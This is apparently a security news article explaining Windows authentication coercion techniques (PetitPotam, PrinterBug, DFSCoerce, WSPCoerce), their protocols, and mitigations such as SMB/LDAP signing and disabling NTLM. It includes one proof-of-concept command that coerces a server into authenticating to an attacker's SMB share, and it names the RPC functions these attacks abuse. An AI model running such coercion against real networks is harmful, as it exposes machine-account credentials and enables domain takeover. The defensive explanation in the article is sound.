Windows Authentication Coercion Attacks Present Major Risks to Enterprise Networks
Authentication coercion remains a potent attack vector in Windows environments, enabling attackers with even low-privileged domain accounts to force targeted systems, often high-value servers or domain controllers, to authenticate to attacker-controlled hosts.
This technique is closely tied to NTLM and Kerberos relay attacks, where the coerced authentication session is intercepted and relayed to other services, potentially granting administrative access or enabling lateral movement across the network.
The process typically involves leveraging Remote Procedure Call (RPC) interfaces available on Windows systems.
Attackers connect to these interfaces and invoke specific functions that prompt the target to initiate an outbound authentication attempt.
The credentials—often those of the machine account (e.g., DOMAIN\COMPUTER$)—are then captured or relayed.
This is especially valuable because computer accounts can be abused for impersonation attacks, such as S4U2Self and Resource-Based Constrained Delegation (RBCD), ultimately leading to domain escalation.
Several coercion techniques have emerged, each exploiting different Windows RPC protocols.
The table below summarizes the primary methods, their applicable protocols, and their capabilities in 2025 environments:
| Method | Protocol | SMB Capable | HTTP Capable | DCERPC Capable | Available on Clients | Available on Servers |
|---|---|---|---|---|---|---|
| PrinterBug | MS-RPRN | ⭕* | ⭕* | ✅* | ✅ | ✅ |
| PetitPotam | MS-EFSRPC | ✅ | ✅ | ❌ | ⭕** | ⭕** |
| DFSCoerce | MS-DFSNM | ✅ | ❌ | ❌ | ❌ | ✅ |
| WSPCoerce | MS-WSP | ✅ | ❌ | ❌ | ✅ | ⭕*** |
SMB/HTTP available before Windows 11 22H2/Server 2025; DCERPC only after
Service runs on demand
Service can be installed
PetitPotam (MS-EFSRPC):
This attack abuses the Encrypting File System Remote Protocol.
By invoking functions like EfsRpcOpenFileRaw, attackers force the target to connect to a specified SMB or HTTP endpoint, leaking credentials.
Tools like Coercer automate the discovery and exploitation of such RPC interfaces.
PrinterBug (MS-RPRN):
Exploits the Print System Remote Protocol, coercing authentication via print notification functions.
While newer Windows versions limit this to DCERPC, older systems still allow SMB/HTTP coercion, making it a versatile method.
DFSCoerce (MS-DFSNM):
Targets the Distributed File System Namespace Management Protocol, available on servers, to trigger SMB-based authentication attempts.
This is especially relevant in environments with default NTLM configurations.
WSPCoerce (MS-WSP):
Abuses the Windows Search Protocol, primarily on workstations, to trigger SMB authentication.
Recent research has produced Python implementations for cross-platform exploitation.
Sample Coercion Code (MS-FSRVP):
python# Proof-of-concept for coercing authentication via MS-FSRVP
./coerce_poc.py -d "LAB.local" -u "user1" -p "Podalirius123!" 192.168.2.51 192.168.2.1
This command forces the Windows Server at 192.168.2.1 to authenticate to the attacker’s SMB share at 192.168.2.51, exposing its machine account credentials.
Mitigations and the Future Outlook
Microsoft has responded to these threats by enabling mitigations such as SMB and LDAP signing, channel binding, and Extended Protection for Authentication (EPA) by default in newer Windows versions (Server 2025, Windows 11 24H2).
These measures make relay attacks significantly harder by requiring cryptographic validation of sessions and messages.
However, these protections are only enabled by default on fresh installations, and many organizations still run older or upgraded systems with less restrictive defaults.
Key Mitigation Strategies:
- Disable NTLM Authentication: Microsoft is deprecating NTLM, and disabling it where possible eliminates many coercion attack paths.
- Enable SMB/LDAP Signing and Channel Binding: Enforce signing and channel binding on all servers to prevent unauthorized relays.
- Monitor and Restrict RPC Interfaces: Limit access to vulnerable RPC interfaces and monitor for anomalous authentication attempts.
As attackers and defenders continue their arms race, understanding the technical details of authentication coercion remains critical for securing Windows environments.
While new mitigations raise the bar, legacy systems and incomplete configurations ensure that coercion techniques will remain relevant for the foreseeable future.